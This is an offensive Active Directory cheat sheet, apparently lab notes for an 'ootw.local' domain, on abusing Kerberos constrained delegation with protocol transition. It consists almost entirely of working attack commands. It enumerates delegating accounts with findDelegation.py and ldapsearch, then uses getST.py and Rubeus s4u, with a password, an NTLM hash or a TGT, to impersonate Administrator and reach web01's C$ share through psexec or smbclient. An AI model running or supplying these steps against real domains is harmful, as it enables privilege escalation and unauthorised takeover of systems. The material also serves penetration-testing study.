Constrained delegation with protocol transition lets a controlled service account impersonate arbitrary users to the SPNs listed in msDS-AllowedToDelegateTo. The account has TRUSTED_TO_AUTH_FOR_DELEGATION, so S4U2Self returns a forwardable ticket and S4U2Proxy can exchange it for the allowed target service.
Enumerate
findDelegation.py ootw.local/student:'student' -dc-ip 10.10.10.200
ldapsearch -LLL -x -H ldap://10.10.10.200 -D "ootw.local\\student" -w 'student' -b "DC=ootw,DC=local" '(&(msDS-AllowedToDelegateTo=*)(userAccountControl:1.2.840.113556.1.4.803:=16777216))' sAMAccountName msDS-AllowedToDelegateTo userAccountControl
Abuse from Linux with password
getST.py -spn 'cifs/web01.ootw.local' -impersonate Administrator -dc-ip 10.10.10.200 'ootw.local/svc_delegate:Password123!'
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass ootw.local/Administrator@web01.ootw.local -dc-ip 10.10.10.200
Abuse from Linux with hash
getST.py -spn 'cifs/web01.ootw.local' -impersonate Administrator -hashes :<NTLM_HASH> -dc-ip 10.10.10.200 'ootw.local/svc_delegate'
export KRB5CCNAME=Administrator.ccache
smbclient -k //web01.ootw.local/C$
Abuse from Windows with Rubeus
Rubeus.exe hash /password:Password123! /user:svc_delegate /domain:ootw.local
Rubeus.exe s4u /user:svc_delegate /rc4:<NTLM_HASH> /impersonateuser:Administrator /msdsspn:cifs/web01.ootw.local /ptt
klist
dir \\web01.ootw.local\c$
Using a controlled TGT
Rubeus.exe asktgt /user:svc_delegate /rc4:<NTLM_HASH> /domain:ootw.local /dc:10.10.10.200 /nowrap
Rubeus.exe s4u /user:svc_delegate /msdsspn:cifs/web01.ootw.local /ticket:<TGT_BASE64> /impersonateuser:Administrator /ptt
Notes
The delegating account is the object with msDS-AllowedToDelegateTo. The target host does not need to be writable. We need control over the delegating account or its usable ticket material.
The impersonated user must exist and must not be protected from delegation.